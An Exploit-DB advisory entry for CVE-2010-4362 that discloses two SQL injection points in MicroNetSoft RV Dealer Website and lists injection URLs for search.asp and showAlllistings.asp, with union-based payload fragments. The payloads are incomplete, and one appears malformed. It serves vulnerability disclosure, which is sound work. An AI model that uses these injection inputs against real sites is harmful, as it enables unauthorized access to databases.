MicroNetSoft RV Dealer Website search.asp & showAlllistings.asp - SQL Injection

2010-11-29T00:00:00
ID EDB-ID:15629
Type exploitdb
Reporter underground-stockholm.com
Modified 2010-11-29T00:00:00

Description

MicroNetSoft RV Dealer Website search.asp & showAlllistings.asp - SQL Injection. CVE-2010-4362. Webapps exploit for the ASP platform.

                                        
TITLE: MicroNetSoft RV Dealer Website Two SQL Injection Vulnerabilities
PRODUCT: MicroNetSoft RV Dealer Website
PRODUCT URL: http://www.micronetsoft.com/store/scripts/prodView.asp?idproduct=77
RESEARCHERS: underground-stockholm.com
RESEARCHERS URL: http://underground-stockholm.com/

SQL INJECTION BUGS:

http://[host]/[path]/search.asp?selStock=x%27%20union%20selecta
http://[host]/[path]/showAlllistings.asp?orderBy=union